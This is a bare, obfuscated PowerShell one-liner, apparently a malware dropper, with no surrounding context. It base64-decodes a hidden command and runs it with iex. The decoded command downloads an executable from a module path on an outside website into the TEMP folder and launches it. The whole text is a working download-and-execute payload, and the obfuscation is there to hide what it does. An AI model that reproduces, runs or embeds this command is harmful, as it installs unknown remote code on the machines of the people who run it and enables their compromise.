iex([sYSteM.tEXt.EnCOdIng]::uTf8.GETStRInG([sySTeM.cOnveRT]::frOMBASe64STRIng('CihOZXctT2JqZWN0IFN5c3RlbS5uZXQud2VCQ2xpRW5UKS5kb1dOTE9hZEZJbEUoJ2h0dHA6Ly93d3cud2VhbHRoYW5kaGVhbHRob3BzLmNvbS9tb2R1bGVzL21vZF9lYXN5YmxvZ3F1aWNrcG9zdC9sYXdkc2lqZG9lZi5leGUnLCIkZW5WOlRFTVBcbGF3ZHNpamRvZWYuZXhlIik7U3RhcnQtUHJvY2VzcyAoIiRlblY6VEVNUFxsYXdkc2lqZG9lZi5leGUiKQoK')));exit
